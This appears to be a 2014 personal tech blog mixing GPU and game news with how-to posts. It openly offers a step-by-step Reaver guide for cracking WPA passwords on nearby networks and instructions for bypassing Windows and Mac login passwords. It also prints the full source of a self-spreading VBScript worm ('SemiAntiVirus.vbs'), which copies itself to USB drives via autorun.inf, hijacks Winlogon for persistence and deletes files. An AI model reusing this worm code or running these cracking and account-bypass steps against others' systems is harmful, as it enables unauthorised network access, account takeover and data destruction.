Nvidia releases the next Titan, the GTX Titan Black

Last year, Nvidia hoped to change the graphics card game when it released the GTX Titan, a high-performance, energy efficient card. Now, Nvidia has released an new model of the Titan, the GTX Titan Black.

Defending the Earth from asteroids with high-powered nuclear explosions

Just over a year ago, the Chelyabinsk meteor entered Earth’s atmosphere, streaked across the southern Urals, and detonated in a fireball that was briefly brighter than the sun.

Happiness is a warm iGun: Dumb gun requires smart watch to shoot.

Gun company Armatix hopes to take the smart device industry by storm with its new smart gun system.

Flappy Bird’s removal from the app store: A case for piracy

Flappy Bird’s developer, Dong Nguyen, has broken his radio silence to say that he pulled the game for the sake of your well-being.

Metal Gear Solid

Metal Gear Solid 5 runs at 1080p on PS4, limited to 720p on Xbox One. The PS3, Xbox 360, PS4, and Xbox One will all receive versions of this game, and it seems as if the difference between each console is incredibly stark.

Wednesday, February 19, 2014

Nvidia releases the next Titan, the GTX Titan Black

Last year, Nvidia hoped to change the graphics card game when it released the GTX Titan, a high-performance, energy efficient card. Now, Nvidia is looking to iterate on that innovation, and has released an new model of the Titan, the GTX Titan Black.

When the Titan first launched last year, it wasn’t Nvidia’s most powerful single-GPU (GK110) card. It ranked high on the food chain, but what it really provided was all that power in an energy efficient solution. Back in November, Nvidia released the GTX 780 Ti, which didn’t exactly smoke the original Titan, but became a better solution for gaming, while the original Titan remained a better solution for general computing. This time around, the Titan Black doesn’t leave gaming for the GTX 780 Ti, as it can not only hold its own in the field, but outperforms the 780 Ti at general computing, making it a top-tier solution.

The differences between the Titan Black and original Titan are mostly iterative — such is the hardware game — but the upgrades do enough to push the Black over the 780 Ti. This time around there are 200 more CUDA cores, totaling 2880, 16 more texture units totaling 240, and the core clock has been bumped 52MHz to 889MHz, and the 6GB of GDDR5 memory is locked at a full 7GHz, up 1GHz from the original card. The Titan Black also sports an HDMI out, two dual-link DVI ports, and a single DisplayPort 1.2 connector. The Titan Black is basically the 780 Ti, but with 6GB of RAM.

If you’d like to stuff one or two in your rig, there’s good news and bad news. A single Titan Black runs $999 — cheaper than buying a PS4 along with an Xbox One — but the new card remains the same price as the original $999 Titan. However, the intriguing question is not if the new card is powerful, but if Nvidia’s other offerings won’t get the job done for a much more affordable price.

If you’re building a gaming rig, Nvidia’s new 750 Ti performs quite well for the price — just $150 — as does AMD’s Radeon R9 270 for just $260. Of course, those cards are not nearly as powerful as the Titan Black, but if you’re looking for something that can handle popular games on the highest settings, the Titan Black would be overkill. However, overkill is part of the fun when building a powerful rig, and boutique PC builders — such as Origin — have already committed to using the Titan Black in their new, insanely powerful rigs. If you’re on the fence about the Titan Black, though, the high-end versions of the GTX 750 Ti are just over the horizon, and it’s safe to assume the those will outperform the Titan Black (at least on the gaming front) just as the GTX 780 Ti outperformed the Titan.

Metal Gear Solid V: Ground Zeroes

Metal Gear Solid V: Ground Zeroes is a hotly anticipated title that’s spanning four different platforms, and that means we’re in for some sweet console comparisons over the next month or so. The PS3, Xbox 360, PS4, and Xbox One will all receive versions of this game, and it seems as if the difference between each console is incredibly stark. It’s no surprise that the PS3 and Xbox 360 versions look comparatively blurry, but the performance gap between the PS4 and Xbox One is a bit surprising.
On its official site, Konami recently posted some juicy details regarding the performance ofMGS V across its four platforms. The Tokyo company released four pairs of screenshots highlighting the graphical differences between last-gen and current-gen consoles, but more importantly, it also announced the resolution and frame rate across each version.
The PS4 will run at 1080p at 60 fps, while the Xbox One will be stuck at 720p at 60 fps. Both of the last-gen consoles will be running at 720p at 30 fps, and will be “scaling internally.” It’s unclear exactly what resolution the Xbox 360 and PS3 versions are rendering in natively, and a Konami representative was not immediately available for comment.

Sunday, February 16, 2014

How to remove Windows Password?

Offline NT Password & Registry Editor is a very fast password "recovery" program. I quote recovery because the program doesn't actually recover the password - it deletes it.


Offline NT Password & Registry Editor is a program that deletes passwords so the first thing you'll need to do is visit the Offline NT Password & Registry Editor website. When the website loads as shown above, scroll down to the Download section and click the link next to Bootable CD image - in the example above, that would be the cd140201.zip file or it would be better if you go with bootable USB image,i.e usb140201.zip file.










Though the step for making bootable image is given in the source website, I am listing it out for your help.

How to make the CD

Unzipped, there should be an ISO image file (cd??????.iso). This can be burned to CD using whatever burner program you like, most support writing ISO-images. Often double-clikcing on it in explorer will pop up the program offering to write the image to CD. Once written the CD should only contain some files like "initrd.gz", "vmlinuz" and some others. If it contains the image file "cd??????.iso" you didn't burn the image but instead added the file to a CD. I cannot help with this, please consult you CD-software manual or friends.

The CD will boot with most BIOSes, see your manual on how to set it to boot from CD. Some will auto-boot when a CD is in the drive, some others will show a boot-menu when you press ESC or F10/F12 when it probes the disks, some may need to have the boot order adjusted in setup.

How to make an bootable USB drive

  • Copy all the files that is inside the usbXXXXXX.zip or on the CD onto an usb drive, directly on the drive, not inside any directory/folder.
  • It is OK if there are other files on the USB drive from before, they will not be removed.
  • Install bootloader on the USB drive, from command prompt in windows (start the command line with "run as administrator" if possible)
  • X:syslinux.exe -ma X:
  • Replace X: with the drive letter the USB drive shows up as (DO NOT USE C:)
  • If it seems like nothing happened, it is usually done.
  • However, a file named ldlinux.sys may appear on the USB drive, that is normal.
  • It should now in theory be bootable.
  • Please know that getting some computers to boot from USB is worse than from CD, you may have to change settings, or some will not simply work at all.

How to Crack a Wi-Fi Network's WPA Password with Reaver

A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. Here's how to crack a WPA or WPA2 password, step by step, with Reaver—and how to protect your network against Reaver attacks.

There are a number of ways you could set up Reaver, but here are the specific requirements for this guide:

  • The BackTrack 5 Live DVD
  • A computer with Wi-Fi and a DVD drive
  • A nearby WPA-secured Wi-Fi network
Step 1: Boot into BackTrackP

To boot into BackTrack, just put the DVD in your drive and boot your machine from the disc. (Google around if you don't know anything about live CDs/DVDs and need help with this part.) During the boot process, BackTrack will prompt you to to choose the boot mode. Select "BackTrack Text - Default Boot Text Mode" and press Enter.P


Eventually BackTrack will boot to a command line prompt. When you've reached the prompt, type startx and press Enter. BackTrack will boot into its graphical interface.

Step 2: Install Reaver

Reaver has been added to the latest version of BackTrack, but if you are using the older version, you need to install Reaver before proceeding.  To install Reaver, you'll first need to connect to the internet. Once you are connected to internet.

Click the Terminal button in the menu bar (or click Applications > Accessories > Terminal). At the prompt, type:
apt-get update
And then, after the update completes
apt-get install reaver
Step 3: Execute command

Find your wireless card: Inside Terminal, type
iwconfig
Press Enter. You should see a wireless device in the subsequent list. Most likely, it'll be named wlan0, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different:

Put your wireless card into monitor mode: Assuming your wireless card's interface name is wlan0, execute the following command to put your wireless card into monitor mode:
airmon-ng start wlan0

This command will output the name of monitor mode interface, which you'll also want to make note of. Most likely, it'll be mon0, like in the screenshot below. Make note of that. 




Find the BSSID of the router you want to crack: Lastly, you need to get the unique identifier of the router you're attempting to crack so that you can point Reaver in the right direction. To do this, execute the following command:


airodump-ng mon0


You'll see a list of the wireless networks in range—it'll look something like the screenshot below:
You'll see a list of the wireless networks in range—it'll look something like the screenshot below:
When you see the network you want, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (it's the series of letters, numbers, and colons on the far left). The network should have WPA or WPA2 listed under the ENC column.

Step 4: Crack a Network's WPA Password with Reaver

Now execute the following command in the Terminal, replacing bssid and moninterface with the BSSID and monitor interface and you copied down above
reaver -i moninterface -b bssid -vv
For example, if your monitor interface was mon0 like mine, and your BSSID was 11:3E:7A:B4:5D:3C (a BSSID I just made up), your command would look like
reaver -i mon0 -b 11:3E:7A:B4:5D:3C -vv
Press Enter, sit back, and let Reaver work its workc. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. 

Saturday, February 15, 2014

SemiAntiVirus.vbs, the VB code that went viral around 4-5 years back !


Here is the script if any one is interested.


This is the auto run file

[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\SHELL32.dll,8
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs

Note: Now you cannot be assured that formatting an affected USB drive is a safe way to get rid of viruses etc. For example, this virus gets into the computer in 5 methods as the above code suggests

1.Opening 
2. Using Autoplay feature
3. Exploring(right click and select explore)
4.Searching for the files saved in the USB drive
5. formatting

Interesting!!

The actual virus script which can be found in c:windows\system32\semiantivirus.vbs

To tell the truth, i do not understand a single line of this coding(except the italicized part which has a good sense of humor) but hope it would help the computer geeks in finding a solution

Important: please do not use this information for unethical purposes

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them and its specially for LRI School only.
'I am not responsible if it goes to other place.
'If you do not belong to LRI Family then, please .......
'Author : Rajkumar Ghale (edited of VirusRemoval.vbs) of Sujin
'About me: I got a lots of program. 
' If u want them, then u can contact me.

'Original Copy : Boot.vbs
'Virus Name : isetup.exe or Kinja.exe

'Another Copy : Sys.vbs
'Other Copy by Sujin : VirusRemoval.vbs
'******************************************************************
'******************************************************************

Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
appfolder=Shells.SpecialFolders("AppData")
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop

crvbs SystemDir,"SemiAntiVirus.vbs"

Shells.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"

Count=Drv.DriveType

Do

delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
Next
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
Shells.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","LRI Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\SemiAntiVirus.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"SemiAntiVirus.vbs"
End if
delt Drives.Path,"sxs.exe",false
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 2000
end if


loop while Count<>1


sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)

For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "SemiAntiVirus.vbs" Then set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
else
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub

sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
Loop
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"SemiAntiVirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1
end if
else
set Writ = fSys.CreateTextFile(fPath & "\SemiAntiVirus.vbs",true,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub

sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
Loop
ReadAl.close
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Writ.close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
else
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Writ.Close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if

End sub

ANDROID SECRET CODES



  1. For IMEI Number: *#06#
  2. For RAM Memory version: *#*#3264#*#*
  3. For FTA SW version: *#*#1111#*#*
  4. For FTA HW version: *#*#2222#*#*
  5. For Touchscreen version: *#*#2663#*#*
  6. View Phone Lock Status: *#7465625#
  7. Executes Emergency Dial Screen to unlock PUK Code: **05**#
  8. Enables Voice Dialing Logging Mode: *#*#8351#*#*
  9. Disables Voice Dialing Logging Mode: *#*#8350#*#*
  10. Change behavior of Power button: *#*#7594#*#*
  11. To test Vibration and Back-light of device: *#*#0842#*#*
  12. To test Proximity/Distance Sensor: *#*#0588#*#*
  13. To test Touchscreen: *#*#2663#*#*
  14. For Audio Test: *#*#0289#*#* or *#*#0673#*#*
  15. To launch Service Mode: *#*#197328640#*#*
  16. Hidden Service Menu (Motorola Droid): ##7764726
  17. Field Test: *#*#7262626#*#*
  18. To format the phone: *2767*3855#
  19. To start GTalk Monitoring: *#*#8255#*#*
  20. To get PDA, Phone, H/W and RF Call Date: *#*#4986*2650468#*#*
  21. Displays Build Time and Change List number: *#*#44336#*#*
  22. Packet Loopback Test: *#*#0283#*#*
  23. LCD Display Test: *#*#0*#*#*
  24. Enter Service Menu (on New Phones): *#0*#
  25. Diagnostic Configuration: *#9090#
  26. USB Logging Control: *#872564#
  27. System Dump Mode: *#9900#
  28. To test Bluetooth: *#*#232331#*#*
  29. To display Bluetooth Physic Address: #*#232337#*#
  30. To test secret GPS: *#*#1472365#*#*
  31. To test other GPS: *#*#1575#*#*
  32. To test WiFi/Wireless LAN of phone: *#*#232339#*#* or *#*#528#*#* or *#*#526#*#*
  33. To display Wi-Fi MAC Address:*#*#232338#*#*
  34. To Restore Factory Settings:*#*#7780#*#*
  35. To create Immediate backup of your multimedia files: *#*#273282*255*663282*#*#*
  36. To display Phone Information: *#*#4636#*#*
  37. To get detailed Camera Information: *#*#34971539#*#*
  38. For Software & Hardware Information: *#12580*369#
  39. To display HSDPA/HSUPA Control Menu: *#301279#

Ever lost ur MAC Password??? Its easy to recover...


Reebot ur machine and Press Command + S key while rebooting.

Leopard or below, type the following commands, hitting Enter after each one and waiting for the prompt to come up again before running the next one:

/sbin/fsck -fy
/sbin/mount -uw /
launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist
dscl . -passwd /Users/rajkumar password


If the Mac is running Lion or above, you'll instead want to use the following commands:

/sbin/fsck -fy
/sbin/mount -uw /
launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist
dscl . -passwd /Users/rajkumar password

Replace rajkumar with the user whose account you want to access and password with the new password you want to assign to that user. If you get an error message about com.apple.DirectoryServicesLocal.plist on a Lion or Mountain Lion machine, just ignore it—the password reset should have still worked.

A Warm Welcome

Welcome you all guys in my blog. Well, i just started blog from, i hope i get y'all support to continue and get success of providing y'all solution with all the IT related problems and question..

With Regards,
Rajkumar Ghale